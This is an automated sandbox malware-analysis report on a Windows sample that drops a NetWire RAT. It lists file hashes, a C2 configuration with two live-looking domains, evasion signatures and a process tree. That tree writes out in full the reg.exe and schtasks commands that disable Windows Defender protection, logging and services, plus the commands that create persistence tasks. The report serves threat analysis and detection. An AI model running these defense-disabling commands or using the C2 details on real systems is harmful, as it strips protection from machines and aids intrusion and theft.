Analysis

  • max time kernel
    131s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/04/2025, 01:09

General

  • Target

    2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe

  • Size

    22.0MB

  • MD5

    2a26ed689a49e2b3cfd71901147f8303

  • SHA1

    d49d9e9e8b0e10a4429a64dde1a0974bc414c819

  • SHA256

    00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579

  • SHA512

    9dfd5314841394af05efbd2d8d995bea3921f83971472168a7bd0c789c94f95932fb117052caa8641ac902e1d942503edccb5536463a7fd65e8bdcb17d62e294

  • SSDEEP

    393216:XA/VQ0ppRcqLGEx1HEApai9u+5Snh5NQluiffTIS:XNYR8I2AblM5qgifUS

Malware Config

Extracted

Family

netwire

C2

maelus.mine.nu:3650

victoire.dyndns.biz:3650

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    first spread

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    0000

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • NetWire RAT payload 6 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Netwire family
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 3 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 12 IoCs
  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Modifies Security services 2 TTPs 4 IoCs

    Modifies the startup behavior of a security service.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
      "C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4004
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4684
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          4⤵
            PID:4560
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            4⤵
            • Modifies Windows Defender DisableAntiSpyware settings
            PID:4764
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
            4⤵
              PID:1728
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
              4⤵
                PID:3840
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1092
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:6096
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:5288
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:4388
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:6072
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                4⤵
                  PID:536
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                  4⤵
                    PID:1572
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                    4⤵
                      PID:1308
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                      4⤵
                        PID:4312
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                        4⤵
                          PID:5456
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                          4⤵
                            PID:1356
                          • C:\Windows\system32\schtasks.exe
                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                            4⤵
                              PID:5932
                            • C:\Windows\system32\schtasks.exe
                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                              4⤵
                                PID:4688
                              • C:\Windows\system32\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                4⤵
                                  PID:5220
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                  4⤵
                                    PID:728
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                    4⤵
                                      PID:3748
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                      4⤵
                                        PID:944
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                        4⤵
                                          PID:3680
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                          4⤵
                                            PID:5376
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                            4⤵
                                              PID:3240
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                              4⤵
                                                PID:2676
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                4⤵
                                                • Modifies Security services
                                                PID:4880
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                4⤵
                                                • Modifies Security services
                                                PID:1192
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                4⤵
                                                • Modifies Security services
                                                PID:1496
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                4⤵
                                                • Modifies Security services
                                                PID:1648
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                4⤵
                                                • Modifies security service
                                                PID:2880
                                          • C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
                                            "C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"
                                            2⤵
                                            • Looks for VirtualBox Guest Additions in registry
                                            • Looks for VMWare Tools registry key
                                            • Checks BIOS information in registry
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Maps connected drives based on registry
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4336
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp"
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3408
                                            • C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
                                              "{path}"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4884
                                          • C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
                                            "C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"
                                            2⤵
                                            • Looks for VirtualBox Guest Additions in registry
                                            • Looks for VMWare Tools registry key
                                            • Checks BIOS information in registry
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Maps connected drives based on registry
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1080
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp"
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:4792
                                            • C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
                                              "{path}"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:6108
                                          • C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
                                            "C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"
                                            2⤵
                                            • Looks for VirtualBox Guest Additions in registry
                                            • Looks for VMWare Tools registry key
                                            • Checks BIOS information in registry
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Maps connected drives based on registry
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4508
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp"
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:4692
                                            • C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
                                              "{path}"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4420
                                            • C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
                                              "{path}"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:3720
                                          • C:\Users\Admin\AppData\Roaming\nb662-full.exe
                                            "C:\Users\Admin\AppData\Roaming\nb662-full.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • System Location Discovery: System Language Discovery
                                            • Checks processor information in registry
                                            PID:4672

                                        Network

                                        MITRE ATT&CK Enterprise v16

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat

                                          Filesize

                                          3KB

                                          MD5

                                          665f21a9b6730aa08e62473e481b8c55

                                          SHA1

                                          717d52e75ac16bf032299828dd61c86af281eb43

                                          SHA256

                                          dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579

                                          SHA512

                                          b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

                                        • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\GetFLE.ini

                                          Filesize

                                          934B

                                          MD5

                                          20e22e58357bf5efd453f66090fabec3

                                          SHA1

                                          73c9b7e6ef3c3a5b03826f9e274df1a3a36c585d

                                          SHA256

                                          677447273c583bde1d350dc29f10ac77e2067a6ddfca1eac51e088e969a35e85

                                          SHA512

                                          d8d4558f17767e6821c3fd57c979ae42d710aacf3eb536b81962714fab6dd680e5d6cdd44a7f236e0f7a4cb5bd993c0c3dfa37ace1b44ebb176dbee2c510afb2

                                        • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\InstallOptions.dll

                                          Filesize

                                          14KB

                                          MD5

                                          2a03c4a7ac5ee5e0e0a683949f70971b

                                          SHA1

                                          3bd9877caaea4804c0400420494ad1143179dcec

                                          SHA256

                                          d4f0042d8e7622b7e14395e926dd02edab3cdc77e82d88108b67a4d2cee9229b

                                          SHA512

                                          1942cdb522859f8dba46824786e361794a62e6201279201e1e0e2e07499fb6252933c5661782fccd77291c3650cafb2a7a08eee5431c8238f0da44840ee4c476

                                        • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\LangDLL.dll

                                          Filesize

                                          5KB

                                          MD5

                                          ebd0da54db9f12ffd15206cc24355793

                                          SHA1

                                          910be3bebdde55eb1ce05915a79f01ebdc622786

                                          SHA256

                                          4066a0cbd9f6bb13c0f6fb064d4647ef7bc68a1be3d0caa4460b5ffd9ed1e0e6

                                          SHA512

                                          cee09db96267b1a30477ff074988606bdf35f9a5aa798a9a10029b11c0c347ab42a124320d777acde458828954cc8cf1a489b1673b31d589cdc4f50d4b86659d

                                        • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\System.dll

                                          Filesize

                                          11KB

                                          MD5

                                          6f5257c0b8c0ef4d440f4f4fce85fb1b

                                          SHA1

                                          b6ac111dfb0d1fc75ad09c56bde7830232395785

                                          SHA256

                                          b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1

                                          SHA512

                                          a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8

                                        • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UAC.dll

                                          Filesize

                                          14KB

                                          MD5

                                          4814167aa1c7ec892e84907094646faa

                                          SHA1

                                          a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee

                                          SHA256

                                          32dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822

                                          SHA512

                                          fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067

                                        • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UserInfo.dll

                                          Filesize

                                          4KB

                                          MD5

                                          8ef0e4eb7c89cdd2b552de746f5e2a53

                                          SHA1

                                          820f681e7cec409a02b194a487d1c8af1038acf0

                                          SHA256

                                          41293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc

                                          SHA512

                                          a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5

                                        • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\cpudesc.dll

                                          Filesize

                                          4KB

                                          MD5

                                          d25102051b33f61c9f7fb564a4556219

                                          SHA1

                                          c683964c11d5175171bd009cb08f87592c923f85

                                          SHA256

                                          e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398

                                          SHA512

                                          8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

                                        • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\nsDialogs.dll

                                          Filesize

                                          9KB

                                          MD5

                                          d9256d9acaecabb20b7e9a1595abfa36

                                          SHA1

                                          ece1cab181dac7729246da1d4494b8daa10c3b70

                                          SHA256

                                          d7b2c55977a541f8d075e48d4e0a82eec79ad247b0ed168c19a8518131acd19c

                                          SHA512

                                          5827cdbfde0e766d1b74ecb22f9614232031da41c21d0f6ff6c9d5dcdfc0adc23e8fd616eb020ab42208932444b5e0cb1e6d6e698bead412eae19624a180b6ff

                                        • C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp

                                          Filesize

                                          1KB

                                          MD5

                                          0a5787dc9dc8d34b15b5515d620b4711

                                          SHA1

                                          23134d726ae6e3662dec53b8efe7fbdf0ce292d4

                                          SHA256

                                          45f4d4e5e626dfdd5c15e429f05e48e0bf7af37eb6681bce04e95ef771835cc0

                                          SHA512

                                          3dc9c6893b8cbd53657c5adbd620aab7834e4fcace0ee4b20432bc8dbf2f94b2b937be5c1eca127370a8148816617f70a36526c0b38ab303b212b4e9a80f139a

                                        • C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp

                                          Filesize

                                          1KB

                                          MD5

                                          68958a2232f919e237985a1787b8f1f9

                                          SHA1

                                          61258bf3ae68488c539e190aa09b8ce50b30b020

                                          SHA256

                                          d7e655a4e938bf5d6021bc78cb7b527bc3de3e4d7bd5d82841c9d653edef84bf

                                          SHA512

                                          261b227902d5a0d7ed9300b173cb6d1acf1c5c6039b3c5d6fc3ab3760567ca5ed08b7bf42e00310be3a76a4502d1ca6f247a128ff114ea71d9bf751ef1354054

                                        • C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp

                                          Filesize

                                          1KB

                                          MD5

                                          5ef665d4bc115b317b7b6a2dab832c62

                                          SHA1

                                          7770dde0aaee0a66567a58ca607697e3266bcfa8

                                          SHA256

                                          75eb659db56c42a6c26ef02b3e28bc2c01df1ec5b5c2ae5cd374c394ca950681

                                          SHA512

                                          bab91fb4a05b69444b3b65f6b8609a3df746fdeb43e2321662c754cdf4bc386286a14d274ea48efdcd5b421e95fbd8aad1af0ca952e4032a76baafa7a8b7b3f1

                                        • C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

                                          Filesize

                                          1.2MB

                                          MD5

                                          9de85017f17de5b5872d27c4f66ca576

                                          SHA1

                                          abb2c3c99e58e498241f3c5b149821b79dbd1f21

                                          SHA256

                                          0771ac3786c447e25abdbbfd18f67b5c25405a4266add5a227c1d69ff5048ce0

                                          SHA512

                                          1265ab52ae96a97372316e2c0f1e8d648d0de7721d80a48340fb991038b6ffba640602d8592cffaa614db9b4f844b69e1d2988049a117631fe755d55759310e5

                                        • C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

                                          Filesize

                                          91KB

                                          MD5

                                          279205de551b3053fc8b973150577120

                                          SHA1

                                          8a78379b3af83ac4f2b1b07b7f968e2db7d1ea0b

                                          SHA256

                                          1d4070b3c282670191d1c5236ccad902e44e33a4d3211488eb52cd4e5223b159

                                          SHA512

                                          29664cb6ff47e5b0016076f7a3c248ed1deb90150669a4cc7357b7a190bd348372f551a652f92c459190ad479ed646cb7be465c389d039d74c5acb3eb254487b

                                        • C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

                                          Filesize

                                          1.2MB

                                          MD5

                                          6c18cac0ed1782d322f237f060c4f07d

                                          SHA1

                                          fee4ecc2fc6c2189a81486bfa2d1a8a182100671

                                          SHA256

                                          6443b61c3f5404dbcd4538e7636a9b1d4b6e5b07f38d95fd9a7794f7f30934e2

                                          SHA512

                                          693d607ee51aec95d070fdc52f9ceb6716b6d36cb89184b67394cdca53c4afa9ca8bff761d39cf4290cf24ceaf5542f1868c029ed56341e92f46b9553c8899d9

                                        • C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

                                          Filesize

                                          1.2MB

                                          MD5

                                          a5cc020492b0db504a7df2dbfed86cd1

                                          SHA1

                                          11fb92cd5b25dfd3a02220286f49d426b3f9d003

                                          SHA256

                                          e98a538725d3864aff69872345f950c572d4b4b727e7c916c0de37e813dbc03d

                                          SHA512

                                          ac69d9d6d0bc8cd632356b0c9bbc6eac6a91f6ab3ff7b3d1cbcdd5ff86cb0414643e251d2e6893afd614336c056914a815c2114b0fbc685f4a2fa780af1b0115

                                        • C:\Users\Admin\AppData\Roaming\nb662-full.exe

                                          Filesize

                                          12.2MB

                                          MD5

                                          2ea0aa5b989197690e73372dc23ae796

                                          SHA1

                                          497d114039585271b89fe954cea473fe32f33772

                                          SHA256

                                          16c723380e74451ae1e7ca45c4abbc4773d4da194f92817d72ffaaa3da5f66f4

                                          SHA512

                                          20ce64434a4cb0a806216e2647d67167a0c953e23d9ac2f8cfb80bf2c4638271d861463c802af156621a28a5c5d78e1b15c616b2e9ee2189bffeff5f7d25541d

                                        • memory/1080-276-0x00000000063D0000-0x000000000641C000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/1080-60-0x00000000052C0000-0x0000000005864000-memory.dmp

                                          Filesize

                                          5.6MB

                                        • memory/1080-53-0x00000000002E0000-0x000000000041A000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/1080-51-0x000000007297E000-0x000000007297F000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1080-94-0x0000000004CB0000-0x0000000004CBA000-memory.dmp

                                          Filesize

                                          40KB

                                        • memory/1080-278-0x0000000006490000-0x00000000064F6000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1080-62-0x0000000004D10000-0x0000000004DA2000-memory.dmp

                                          Filesize

                                          584KB

                                        • memory/3720-295-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/3720-297-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/4336-96-0x00000000056E0000-0x00000000056FC000-memory.dmp

                                          Filesize

                                          112KB

                                        • memory/4336-301-0x0000000072970000-0x0000000073120000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4336-97-0x00000000057A0000-0x000000000583C000-memory.dmp

                                          Filesize

                                          624KB

                                        • memory/4336-54-0x0000000072970000-0x0000000073120000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4336-114-0x0000000072970000-0x0000000073120000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4336-55-0x0000000000860000-0x000000000099C000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/4336-95-0x0000000006480000-0x00000000069AC000-memory.dmp

                                          Filesize

                                          5.2MB

                                        • memory/4336-275-0x0000000006AB0000-0x0000000006AFC000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/4508-277-0x0000000006290000-0x00000000062DC000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/4508-59-0x00000000001F0000-0x000000000032A000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/4884-290-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/4884-293-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/6108-292-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/6108-288-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB